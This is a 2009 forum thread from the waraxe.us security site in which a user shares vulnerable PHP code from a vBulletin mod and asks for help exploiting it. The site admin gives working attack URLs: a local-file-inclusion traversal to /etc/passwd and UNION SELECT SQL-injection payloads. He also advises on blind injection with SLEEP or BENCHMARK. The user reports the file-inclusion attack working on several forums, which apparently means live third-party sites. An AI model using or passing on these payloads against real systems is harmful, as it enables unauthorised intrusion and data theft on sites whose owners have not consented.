Login or Register ::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  :: April 16, 2024 Menu  Home  Logout  Discussions  Forums  Members List  IRC chat  Tools  Base64 coder  MD5 hash  CRC32 checksum  ROT13 coder  SHA-1 hash  URL-decoder  Sql Char Encoder  Affiliates  y3dips ITsec  Md5 Cracker  User Manuals  AlbumNow  Content  Content  Sections  FAQ  Top  Info  Feedback  Recommend Us  Search  Journal  Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9145 People Online: Visitors: 410 Members: 0 Total: 410 PacketStorm News ·301 Moved Permanently read more... IT Security and Insecurity Portal www.waraxe.us Forum Index -> Sql injection -> Help with Mysql Injection - Bugged script    View previous topic :: View next topic  Help with Mysql Injection - Bugged script Posted: Sun Jan 11, 2009 4:22 pm delta Advanced user   Joined: Jan 11, 2009 Posts: 60 I found this bug in one component and i think that can be exploited, but need some help... I will give some details... Quote: Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in [path]/file.php on line 204 Warning: include(folder/forms/.php) [function.include]: failed to open stream: No such file or directory in [path]/file.php on line 300 Warning: include() [function.include]: Failed opening 'folder/forms/.php' for inclusion (include_path='.:/usr/lib/php') in [path]/file.php on line 300 Some piece of code of file.php: Code: if($form){    $the_target = $form;    $the_target = explode(",",$the_target);    $forum      = $the_target[0];    $formulario = $the_target[1];    $links      = $the_target[2];    $sqlSecure="select id from ".TABLE_PREFIX."up_grupos where forumid = '".$forum."'".( ($membroNormal)?" and `permissoes`='livre'":"" );    $qrySecure = mysql_query($sqlSecure);    $forum_permitido=(mysql_num_rows($qrySecure))?true:false; Line 204: Code:    $forum_permitido=(mysql_num_rows($qrySecure))?true:false; Query of table up_grupos: Code: CREATE TABLE `". TABLE_PREFIX ."up_grupos` (   `id` int(11) NOT NULL auto_increment,   `idGrupo` int(11) default NULL,   `descricao` varchar(150) default NULL,   `tipo` varchar(4) NOT NULL default 'http',   `conteudo` varchar(20) NOT NULL default 'filme',   `nivel` decimal(2,0) NOT NULL default '0',   `forumid` int(11) default NULL,   `permissoes` varchar(5) NOT NULL default 'staff',   PRIMARY KEY  (`id`) ) ENGINE=MyISAM  ; Posted: Tue Jan 13, 2009 3:30 am delta Advanced user   Joined: Jan 11, 2009 Posts: 60 So... no one? =/ Posted: Wed Jan 14, 2009 12:52 pm Rastlin Regular user   Joined: Jan 03, 2009 Posts: 21 delta wrote: So... no one? =/ There is insuficient data .... I mighty try to guess that somehow your giving a wrong path somewhere .... Posted: Wed Jan 14, 2009 1:40 pm waraxe Site admin   Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu More info needed - input parameters. There can be blind sql injection or maybe even LFI or RFI, but without additional info we can't help you. Posted: Wed Jan 14, 2009 3:23 pm delta Advanced user   Joined: Jan 11, 2009 Posts: 60 I don't think it's RFI or LFI. It's a vbulletin MOD. This send information to the database. Ex.: http://site.com/forum/file.php?form=9,blabla,http It uses explodes as you can see in the code: Code:    $the_target = explode(",",$the_target); and send to these vars... Code:    $forum      = $the_target[0];    $formulario = $the_target[1];    $links      = $the_target[2]; and then comes the query: Code:    $sqlSecure="select id from ".TABLE_PREFIX."up_grupos where forumid = '".$forum."'".( ($membroNormal)?" and `permissoes`='livre'":"" );    $qrySecure = mysql_query($sqlSecure) So, teorically i should do that: http://site.com/forum/file.php?form=SQL INJECTION CODE,blabla,http Sry for my poor english and thanks in advance for the help. Edited: Now i tried http://site.com/forum/file.php?form=9',blabla,http as i said before and got only this: Code: Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in [path]/file.php on line 204 [/i] No other errors And i forgot to thell that he gets the $formulario and do this in other line of the code: Code: include "folder/forms/".$formulario.".php"; That's the reason i' was getting the 2 include errors... Sooo... That helps now? Posted: Wed Jan 14, 2009 4:15 pm waraxe Site admin   Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu This can be LFI, try this: Code: http://site.com/forum/file.php?form=9,../../../../../../../../../../etc/passwd%00,http For sql injection try: Code: http://site.com/forum/file.php?form=-1'+UNION+SELECT+0--+,bla,http Code: http://site.com/forum/file.php?form=-1'+UNION+SELECT+1--+,bla,http This is probably blind sql injection though. Can you post that MOD-s name? I can look @ src code and look for possible exploits Posted: Wed Jan 14, 2009 5:12 pm delta Advanced user   Joined: Jan 11, 2009 Posts: 60 waraxe wrote: This can be LFI, try this: Code: http://site.com/forum/file.php?form=9,../../../../../../../../../../etc/passwd%00,http For sql injection try: Code: http://site.com/forum/file.php?form=-1'+UNION+SELECT+0--+,bla,http Code: http://site.com/forum/file.php?form=-1'+UNION+SELECT+1--+,bla,http This is probably blind sql injection though. Can you post that MOD-s name? I can look @ src code and look for possible exploits The LFI works fine(in some forums i get 403 or 406) xD I tried the sql injection Code: http://site.com/forum/file.php?form=-1'+UNION+SELECT+0--+,bla,http and no erros displayed. The problem now is how i can exploit the injection since can't use "," because of the explode :S The mod have 1 more sql injection bugged file that i found, can't give you the mod name now, but later maybe Thanks a lot for your help Posted: Wed Jan 14, 2009 7:16 pm waraxe Site admin   Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Yes, this can be tricky without ","-s. But you could probably use regular expressions (regexes) instead of ORD(SUBSTR(hash,2,1)) and CASE/WHERE/ELSE instead of IF(1,2,3). I'm not 100% sure about that, it needs testing Posted: Wed Jan 14, 2009 7:27 pm delta Advanced user   Joined: Jan 11, 2009 Posts: 60 This will be very complicated T___T I think that's better to try the other file... Do you mind taking a look in the other file to see what can be done? If ok i will send to you via PM. Posted: Wed Jan 14, 2009 8:59 pm waraxe Site admin   Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu I'm too busy right now - new advisory is coming out very soon and i'm preparing it right now Posted: Wed Jan 14, 2009 9:11 pm delta Advanced user   Joined: Jan 11, 2009 Posts: 60 Ok, no problem ^^ In the other file i'm getting some erros: http://site.com/file.php?do=lol&action=form&id_topic=6727' Quote: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [path]/folder/editar.php on line 237 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [path]/folder/editar.php on line 244 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [path]/folder/editar.php on line 266 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [path]/folder/editar.php on line 288 Warning: include(forms/.php) [function.include]: failed to open stream: No such file or directory in [path]/folder/editar.php on line 436 Warning: include() [function.include]: Failed opening 'forms/.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in [path]/folder/editar.php on line 436 When i do: http://site.com/file.php?do=lol&action=form&id_topic=-1'+UNION+SELECT+1,2,3,4--+ this error disappear(same if i change the column number, others erros will disappear and some remain because the column number of tables is different): Code: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [path]/folder/editar.php on line 244 but not any number of column displays in the page, what can i do next? Posted: Wed Jan 14, 2009 9:54 pm waraxe Site admin   Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu As usual - if you can't get direct visual feedback from target, then try blind injection. Look for response differences or as last resort use BENCHMARK() or SLEEP(). Help with Mysql Injection - Bugged script   www.waraxe.us Forum Index -> Sql injection You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT   Page 1 of 1   All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 Year Oldest FirstNewest First  Select a forum Security Research by waraxe----------------General discussionHow to fixMetasploit related Hash cracking requests----------------MD5 hashesAll other hashesHash related information http://www.waraxe.us portal----------------SuggestionsCooperation proposals Security bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holes Various software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo Gallery Programming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssembler Reverse engineering----------------Newbies cornerDisassemblingPHP script decode requests Miscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy database Direct Downloads----------------ToolsTutorialsWordlists Recycle Bin----------------Removed messagesOutdated posts   Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.162 Seconds